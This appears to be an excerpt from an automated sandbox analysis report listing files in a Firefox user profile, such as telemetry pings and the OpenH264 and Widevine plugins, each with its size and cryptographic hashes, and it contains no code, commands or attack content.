C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\a1299b2b-d5c1-40fe-b2e5-e91f2d7e139b
Filesize671B
MD5bafa8b3ea120ee6a0e860799009fcf7e
SHA186b328433db67f6d38ca4a763a1f014c226e60a0
SHA256900f9ff0eaa5ab4a96a069a9b2689d1285bd250d6098740bc9f45f4f83549f3b
SHA512c2eec21a186504b899671bd3aa2b27e4d9f78c6e836b329fe2efe06bb4e8a51eaa64fc7b14a1543e04e115eef1642b7fd74e328fff4ed04c1344eff8b581f843
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\d9d3bfe7-b788-415a-a9fe-99948fc4a8d9
Filesize28KB
MD524e9911a2a15c19423d39916b27eab90
SHA197ef9de317c35b69c804b46f9b26b12228338fb1
SHA256f00a640a88c6bef7a914075287109e7583a1dd736de829fd3e25abe7d0e8e0f4
SHA512dc04ca538f1e7b095519eb797a1ce50076734044f3cb660fdc0db14c5bbb6e7052ac2b91c68f57d1edccb592e8614ec12fa0d62e63758a699d0d6c97850cdf9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
9KB
MD5f1a33e2276c5393129593c774f09be6f
SHA156d742a549f8ac2e6c135c9d8dba15360a3983c3
SHA256a771646130c498cce69f92d8b1aaf1219a6e404f2927ddd650e46b08271c023c
SHA5128076340769a114a1afccf202e3c420f88c862af61f5345fcaeb05d5907f88c0a97f469bebcda206888ee2f3cbe8ff35fdb3dc7c61bf5cbb5793e90a0b2053acc
-
Filesize
10KB
MD5d9bea1903f5e177cdc18bbcc1dab0775
SHA1e653e1205fdd9b3c01606f6ed62c1e80d84a0c45
SHA2567ff37b4a51be372acf0e650bd51b71a851b593836562194ed9346decb4fb1f58
SHA512debe8f0385e2b471c9abdd59c5da8b8fc0a28864fee0aed4aad394087f8796b2f3f9e45959c0d20d43eb05ceb0f5a90d2eb4324e304dbccc52c46f3ddf76f1d1
-
Filesize
9KB
MD5dfb0400d1a77ffb15cde456b2cdeec0f
SHA1fd4af4a023e325dcb5c4c5360805aa1c2217eeda
SHA2561007d8d31584a29169e6704d524ca0c388692ebe64ca720d7a9296b42b32cb6a
SHA512a1fe02e61d35a1d8fe5c8e2c214808c1f84c96f986bd52717163a4dad8899a7878257d92cc4f71166872a0d52149251f8cb53c7392c8a9b28a6e364cfe7fae25
-
Filesize
2KB
MD5f63714e3ad1cc2dbf8465ca21b151566
SHA1e294fcaedd5f255ae930ad78509e57001369a915
SHA256838cc8e53c2ff83ce4ec76dac7679b9a888cd7923b9f60ff9194cad29283da25
SHA51205e85a65ba2a618630fa850f53d555facd0ff3979376306b3a044b30f7524fd1cba3319a759b2044aedb1ac1e6127bab0ed27c141ea816c70b1143410ff375bf
-
Filesize
236B
MD5e98b04b624a464b1c29c568ce5c01d80
SHA10e2dbfea3364a1fe6e0a71cc73a9c816badf8ebc
SHA256e1af114b172e3e860fffedc2dd9845bd9c55407915e2e3fa2178b93741e2f1ef
SHA5123c62665d36228919f0af16328c1fe20a1f44f7bb15d6c20fe52ddb20f4c300516c10096830790fdf77abe6bc1c36308da1f5f3b7499bc9de1c346c61a7b2d45c
-
Filesize
941B
MD51809fe3ba081f587330273428ec09c9c
SHA1d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9
SHA256d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457
SHA512e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28
-
Filesize
369B
MD58b2f8b71178a4e99b5358e9e6ad2db5b
SHA126556abb464e42523c3f166ac55e5b74255b13ed
SHA25690a396dab7e88da62546d17430e1915c06a631edc5ea965bc4e4c417ad31f8aa
SHA5126512ef322237053ea3d69283fb3706fd4eebb0dd6b2015ed4cda5993ea34ec1b423e1503bdb08b560e5a1636926360cf6424d3a39ddeb5968d5299dfbaf3c16d
-
Filesize
652B
MD5948dca49ee090711abd80c3d94065e89
SHA17c645e1d05b9cd46138a0d1936350b5d9cefbd6c
SHA25631cdeebecb211e84d227d802fbd73fb3fe279a385c7742c29c3f7ab5b8f7bfbb
SHA512cf5a4a78f265945b22f4c02aedbe0af60035062b88b798deb01d58017a0ae6e179f852debff6886bd5ed72daeb3ab3cbd2be94f2f694d9e7f1bd33c299cf77c0